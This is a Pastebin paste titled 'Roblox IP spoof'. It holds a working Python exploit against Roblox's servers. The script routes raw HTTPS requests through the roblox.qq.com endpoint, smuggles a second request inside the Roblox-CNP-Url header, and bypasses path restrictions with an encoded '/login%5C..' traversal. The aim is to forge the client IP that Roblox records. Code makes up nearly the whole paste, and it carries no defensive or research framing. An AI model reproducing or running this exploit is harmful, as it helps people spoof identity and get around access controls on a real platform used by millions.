XxMirayxX21

Roblox IP spoof

May 25th, 2021
1,066
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # h0nda
  2. # 2021-04-11
  3.  
  4. from http.client import HTTPResponse
  5. from urllib.parse import urlsplit, unquote, quote
  6. import socket
  7. import ssl
  8. import requests
  9. import json
  10.  
  11. REAL_IP = requests.get("https://api.ipify.org?format=json").json()["ip"]
  12.  
  13. def spoof_request(method, url, headers=None, data=None, ip=None):
  14.     purl = urlsplit(url)
  15.     path = purl.path + ("?" + purl.query if purl.query else "")
  16.  
  17.     # bypass path restrictions on www.roblox.com
  18.     if purl.hostname == "www.roblox.com":
  19.         path = "/login%5C.." + path.replace("/", "%5C")
  20.    
  21.     conn = socket.create_connection((purl.hostname.replace("roblox.com", "roblox.qq.com"), 443))
  22.     context = ssl.create_default_context()
  23.     conn = context.wrap_socket(conn, server_hostname=purl.hostname.replace("roblox.com", "roblox.qq.com"))
  24.  
  25.     # payload that'll "override" the request
  26.     payload = ""
  27.     payload += " HTTP/1.1\r\n"
  28.     payload += "Host: %s\r\n" % purl.hostname
  29.     payload += "Content-Length: *\r\n"
  30.     payload += "Roblox-CNP-True-IP: %s\r\n" % ip
  31.     if headers:
  32.         for key, value in headers.items():
  33.             payload += "%s: %s\r\n" % (key, value)
  34.     payload += "\r\n"
  35.     if data:
  36.         payload += data
  37.  
  38.     # calculate the content-length overhead
  39.     # (the actual content of this doesn't matter, only the length)
  40.     overhead = ""
  41.     overhead += " HTTP/1.1\r\n"
  42.     overhead += "Connection: keep-alive\r\n"
  43.     overhead += "Host: %s\r\n" % purl.hostname.lower().replace("roblox.com", "roblox.qq.com", 1)
  44.     overhead += "Roblox-Domain: cn\r\n"
  45.     overhead += "Roblox-CNP-Date: 2021-03-06T20:41:52 08:00\r\n"
  46.     overhead += "Roblox-CNP-Secure: cnGgYV/BzUMyhjw3iIiKi0TD6Q0=\r\n"
  47.     overhead += "Roblox-CNP-True-IP: %s\r\n" % REAL_IP
  48.     # funnily enough, this header is also left unencoded
  49.     overhead += "Roblox-CNP-Url: http://%s%s%s\r\n" % (
  50.         purl.hostname.lower().replace("roblox.com", "roblox.qq.com"),
  51.         unquote(path),
  52.         payload)
  53.     overhead += "Content-Length: 0\r\n"
  54.     overhead += "X-Stgw-Time: 1615034512.456\r\n"
  55.     overhead += "X-Client-Proto: https\r\n"
  56.     overhead += "X-Forwarded-Proto: https\r\n"
  57.     overhead += "X-Client-Proto-Ver: HTTP/1.1\r\n"
  58.     overhead += "X-Real-IP: %s\r\n" % REAL_IP
  59.     overhead += "X-Forwarded-For: %s\r\n\r\n" % REAL_IP
  60.     overhead = overhead.replace("*", str(len(overhead)))
  61.     payload = payload.replace("*", str(len(overhead)))
  62.  
  63.     # the "real" request that is sent
  64.     request = ""
  65.     request += "%s %s%s HTTP/1.1\r\n" % (method, path, quote(payload))
  66.     request += "Host: %s\r\n" % purl.hostname.replace("roblox.com", "roblox.qq.com")
  67.     request += "Content-Length: 0\r\n"
  68.     request += "\r\n"
  69.  
  70.     conn.send(request.encode("UTF-8"))
  71.  
  72.     resp = HTTPResponse(conn)
  73.     resp.begin()
  74.     return resp
  75.  
  76. if __name__ == "__main__":
  77.     response = spoof_request(
  78.         method="GET",
  79.         url="https://www.roblox.com/game/join.ashx",
  80.         ip="127.0.0.1"
  81.     )
  82.     data = response.read().decode("UTF-8")
  83.     print("Reflected ip: %s" % data.split("ClientIpAddress")[1].split(",")[0])
RAW Paste Data